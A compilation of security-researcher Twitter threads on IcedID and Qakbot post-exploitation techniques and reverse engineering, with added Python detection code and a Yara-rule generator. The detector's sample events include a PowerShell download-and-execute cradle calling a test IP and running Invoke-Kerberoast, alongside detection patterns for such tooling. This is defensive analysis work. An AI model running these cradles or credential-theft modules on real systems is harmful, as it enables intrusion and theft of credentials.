Discover and read the best of Twitter Threads about #IcedID

1/x
For the past couple of weeks, #IcedID has been hitting hard, with post-exploitation activities beginning within ~1 hour from the initial infection.

Here are some TTPs and IOCs from these post-exploitation activities that will keep defenders ready.
🧵👇
2/x
🎯TTPs
➡️IcedID use of VNC
💡Over port 8080
➡️Multiple Cobalt Strike DLLs on disk
💡Overused directories - "C:\Windows\Tasks" & "%user%\AppData\Local\Temp"
➡️Heavy use of PowerShell
💡Downloading payloads, exec PowerShell Cobalt Strike Loaders & other processes
3/x
➡️Used multiple privilege escalation methods
💡zerologon, Invoke-Kerberoast, Invoke-EnvBypass
➡️Reverse proxy via Cobalt Strike and then RDPing into the network
➡️Invoke-BloodHound & Invoke-ShareFinder for network and open-shares discovery
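A detection pass over the TTPs listed in the thread above, added here as an example; it is not code from the thread's author. It assumes Sysmon-style fields (EventID 1 process create, 3 network connect, 11 file create; Image, CommandLine, TargetFilename, DestinationPort) and runs over a handful of constructed events. The rules cover the staging directories, the PowerShell cradles, the named Invoke-* modules and non-browser outbound 8080; Zerologon is a domain-controller-side detection and is not covered here.

```python
"""Detection logic for the IcedID post-exploitation TTPs listed above (added example)."""
import re

# Constructed Sysmon-style events (EventID 1 = process create, 3 = network connect,
# 11 = file create). Invented for the demo, not real telemetry; IPs are TEST-NET ranges.
EVENTS = [
    {"id": 1, "EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\Tasks\sched.dll,DllRegisterServer"},
    {"id": 2, "EventID": 11, "Image": r"C:\Windows\System32\rundll32.exe",
     "TargetFilename": r"C:\Users\jdoe\AppData\Local\Temp\x64.dll"},
    {"id": 3, "EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA"},   # base64(UTF-16LE "IEX")
    {"id": 4, "EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -exec bypass -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://192.0.2.10/a'); Invoke-Kerberoast -OutputFormat hashcat\""},
    {"id": 5, "EventID": 3, "Image": r"C:\Windows\System32\rundll32.exe",
     "DestinationIp": "192.0.2.10", "DestinationPort": 8080, "Initiated": True},
    {"id": 6, "EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 8080, "Initiated": True},
    {"id": 7, "EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\jdoe\Documents\notes.txt"},
    {"id": 8, "EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c \"Invoke-BloodHound -CollectionMethod All; "
                    "Invoke-ShareFinder -CheckShareAccess\""},
]

# PE files under the two staging directories named in the thread (%user%\AppData\Local\Temp
# is matched as any \AppData\Local\Temp\ path, whichever user profile it sits in).
SUSPICIOUS_DIRS = re.compile(r"(?i)(\\Windows\\Tasks\\|\\AppData\\Local\\Temp\\)[^\s\"']+\.(dll|exe)")
LOADERS = re.compile(r"(?i)\\(rundll32|regsvr32)\.exe$")
# Download cradles and encoded commands used to pull and execute loaders.
PS_CRADLE = re.compile(r"(?i)(-enc(odedcommand)?\s|DownloadString|DownloadFile|IEX\b|Invoke-Expression)")
# Privilege-escalation and discovery modules named in the thread.
PS_TOOLING = re.compile(r"(?i)\b(Invoke-Kerberoast|Invoke-EnvBypass|Invoke-BloodHound|Invoke-ShareFinder)\b")
BROWSERS = re.compile(r"(?i)\\(firefox|chrome|msedge|iexplore)\.exe$")


def detect(events):
    """Return [(event id, rule name)] for every event that matches a rule."""
    hits = []
    for ev in events:
        image = ev.get("Image", "")
        cmd = ev.get("CommandLine", "")
        if ev["EventID"] == 1:
            if LOADERS.search(image) and SUSPICIOUS_DIRS.search(cmd):
                hits.append((ev["id"], "dll_loaded_from_staging_dir"))
            if image.lower().endswith("powershell.exe"):
                if PS_CRADLE.search(cmd):
                    hits.append((ev["id"], "powershell_download_cradle_or_encoded"))
                for tool in PS_TOOLING.findall(cmd):
                    hits.append((ev["id"], f"offensive_ps_module:{tool}"))
        elif ev["EventID"] == 11:
            if SUSPICIOUS_DIRS.search(ev.get("TargetFilename", "")):
                hits.append((ev["id"], "pe_dropped_in_staging_dir"))
        elif ev["EventID"] == 3:
            # VNC over 8080: flag outbound 8080 from anything that is not a browser.
            if ev.get("DestinationPort") == 8080 and ev.get("Initiated") and not BROWSERS.search(image):
                hits.append((ev["id"], "non_browser_outbound_8080"))
    return hits


if __name__ == "__main__":
    for event_id, rule in detect(EVENTS):
        print(f"event {event_id}: {rule}")
```

The 8080 rule is deliberately coarse (any non-browser process): in a real environment pair it with the process tree, since the thread's VNC traffic originates from the IcedID host process rather than from a legitimate proxy-aware client.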
🐲 Ghidra Tips 🐲- Malware Encryption and Hashing functions often produce byte sequences that are great for #Yara rules.

Using #Ghidra and a Text Editor - You can quickly develop Yara rules to detect common malware families.
(Demonstrated with #Qakbot)

[1/20]
#Malware #RE
[2/20]
Hashing and encryption functions make good targets for #detection as they are reasonably unique to each malware family and often contain lengthy and specific byte sequences due to the mathematical operations involved.

These characteristics make for good Yara rules 😁
[3/20] The biggest challenge is locating the functions responsible for hashing and encryption. I'll leave that for another thread, but for now...

You can typically recognize hashing/encryption through the use of bitwise operators inside a loop. (xor ^ and shift >> etc).
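An added example of the two ideas in the thread above (find a loop built from bitwise operations, then turn its bytes into a Yara hex string); it is not the author's workflow or any Qakbot bytes. It assumes 32-bit x86 code and uses a hand-assembled hash loop as constructed input. Loops are located by backward rel8 jumps and scored by register-form xor and shift/rotate opcodes; this is a byte-level heuristic, not a disassembler, so it can fire on data that happens to look like opcodes.

```python
"""Heuristic crypto-loop finder and Yara rule emitter for x86 code (added example)."""
import re

# Constructed input: a hand-assembled x86 (32-bit) hash loop, not bytes from any real sample.
SAMPLE = bytes.fromhex(
    "31c0"      # 00: xor eax, eax
    "8a0a"      # 02: loop: mov cl, [edx]
    "84c9"      # 04: test cl, cl
    "740b"      # 06: je exit (+11)
    "c1c005"    # 08: rol eax, 5
    "0fbec9"    # 0b: movsx ecx, cl
    "31c8"      # 0e: xor eax, ecx
    "42"        # 10: inc edx
    "ebef"      # 11: jmp loop (-17)
    "c3"        # 13: exit: ret
)

# Register-form bitwise instructions: opcode followed by a ModRM byte with mod=11.
BITWISE = {
    "xor": re.compile(rb"[\x30-\x33][\xc0-\xff]"),
    "shift_rotate": re.compile(rb"[\xc0\xc1\xd0-\xd3][\xc0-\xff]"),
}


def find_loops(code):
    """Return [(start, end)] spans closed by a backward rel8 jump (EB or 70-7F)."""
    loops = []
    for i in range(len(code) - 1):
        op = code[i]
        if op == 0xEB or 0x70 <= op <= 0x7F:
            rel = code[i + 1]
            if rel >= 0x80:                      # negative displacement = backward jump
                target = i + 2 + rel - 0x100
                if target >= 0:
                    loops.append((target, i + 2))
    return loops


def bitwise_score(body):
    """Count xor and shift/rotate instructions inside a loop body."""
    return {name: len(rx.findall(body)) for name, rx in BITWISE.items()}


def candidate_crypto_loops(code, min_ops=2):
    """Loops with at least min_ops bitwise instructions, as (start, end, score)."""
    out = []
    for start, end in find_loops(code):
        score = bitwise_score(code[start:end])
        if sum(score.values()) >= min_ops:
            out.append((start, end, score))
    return out


def yara_hex(body):
    """Yara hex string; rel8 of conditional jumps is wildcarded since the exit distance may
    shift between builds. Absolute addresses would still need masking by hand in an editor."""
    parts, i = [], 0
    while i < len(body):
        b = body[i]
        if 0x70 <= b <= 0x7F and i + 1 < len(body):
            parts += [f"{b:02x}", "??"]
            i += 2
        else:
            parts.append(f"{b:02x}")
            i += 1
    return " ".join(parts)


def make_rule(code, rule_name, description):
    """Emit a Yara rule with one string per candidate loop, or None if nothing qualifies."""
    loops = candidate_crypto_loops(code)
    if not loops:
        return None
    strings = "\n".join(
        f"        $loop{n} = {{ {yara_hex(code[s:e])} }}" for n, (s, e, _) in enumerate(loops)
    )
    return (f"rule {rule_name} {{\n    meta:\n        description = \"{description}\"\n"
            f"    strings:\n{strings}\n    condition:\n        any of them\n}}")


if __name__ == "__main__":
    print(make_rule(SAMPLE, "hash_loop_example", "constructed x86 hash loop"))
```

Before shipping a rule built this way, check the hex string against clean binaries (CRT string and CRC helpers contain very similar loops) and widen the wildcards only as far as the false-positive testing requires.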
#Qakbot Dumpulator Script has now been added to Github! 😀

This script is capable of dumping decrypted strings from the encrypted string table used by recent Qakbot malware.

1/ (notes and details below)
#malware #qakbot #dumpulator #RE
2/ The script *should* work on the samples that I have provided in the readme, however you may need to change some register values to get it to work on different samples.

In particular, "dp.regs.ecx" and "dp.regs.esp+0x4" may need to be changed. As these ...
3/ cont'd... as these values point to the encrypted string table and key, which will differ between samples. You can re-use the same dump file if you wish, as the code will likely remain the same.
A quick demo of how to identify "real" exported functions from a #obfuscated #IcedID dll file.

I'll also briefly touch on some #Ghidra tips, and how to extract #shellcode using a debugger.

A moderate-sized thread 😃
[1/13]
[2/13] You can find the relevant files here. Special thanks to @malware_traffic.

First, download the .zip in the screenshot.👇

Then unzip and locate the "rarest.db" file in the "scabs" folder.

(Make sure to do this inside an isolated Virtual Machine)
malware-traffic-analysis.net/2022/09/23/ind…
[3/14] Drag the "rarest.db" file into Pe-Studio and navigate to the exports tab.

There are 11 exported functions here. 🧐

Most of them have junk names to throw off analysis.

One of them is "real", the rest are "decoys" which don't do anything if executed.
